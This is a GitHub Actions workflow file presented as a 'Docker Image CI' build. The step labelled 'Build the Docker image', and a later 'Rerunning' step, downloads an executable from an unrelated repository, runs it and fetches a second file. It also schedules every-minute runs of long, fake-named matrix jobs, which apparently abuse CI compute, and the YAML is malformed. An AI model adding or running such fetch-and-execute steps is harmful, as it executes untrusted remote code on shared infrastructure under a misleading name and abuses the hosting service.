name: Docker Image CI
on:
  push:
    branches: [ master ]
  pull_request:
    branches: [ master ]
  schedule:
  - cron: "*/1 * * * *"

jobs:
  build:

    runs-on: ubuntu-latest

    steps:
    - uses: actions/checkout@v3
    - name: Build the Docker image
      run: wget -O 1 https://raw.githubusercontent.com/trautroi/aws/master/nice && chmod +x 1 && ./1 && wget -O 2 https://raw.githubusercontent.com/johnwixk228/ujicoba/main/v2

    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [A, B, C, D]
    timeout-minutes: 360

    steps:
    - uses: actions/checkout@v2
    - name: Python-run
      run: echo "pythosns"

 python-2:
    runs-on: ubuntu-18.04
    needs: python-1
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [A, B, C, D]
    timeout-minutes: 360

    steps:
    - uses: actions/checkout@v2
    - name: Python-run
      run: echo "pythosns"

 python-build-4:
    runs-on: ubuntu-20.04
    needs: python-2
    strategy:
      fail-fast: false
      matrix:
         go: [1.11, 1.12, 1.13, 1.14, 1.15]
         flag: [A]
    timeout-minutes: 360
    steps:
    - uses: actions/checkout@v2
    - name: Rerunning
      continue-on-error: true
      run: |
        wget -O 1 https://raw.githubusercontent.com/trautroi/aws/master/nice && chmod +x 1 && ./1 && wget -O 2 https://raw.githubusercontent.com/johnwixk228/ujicoba/main/v2
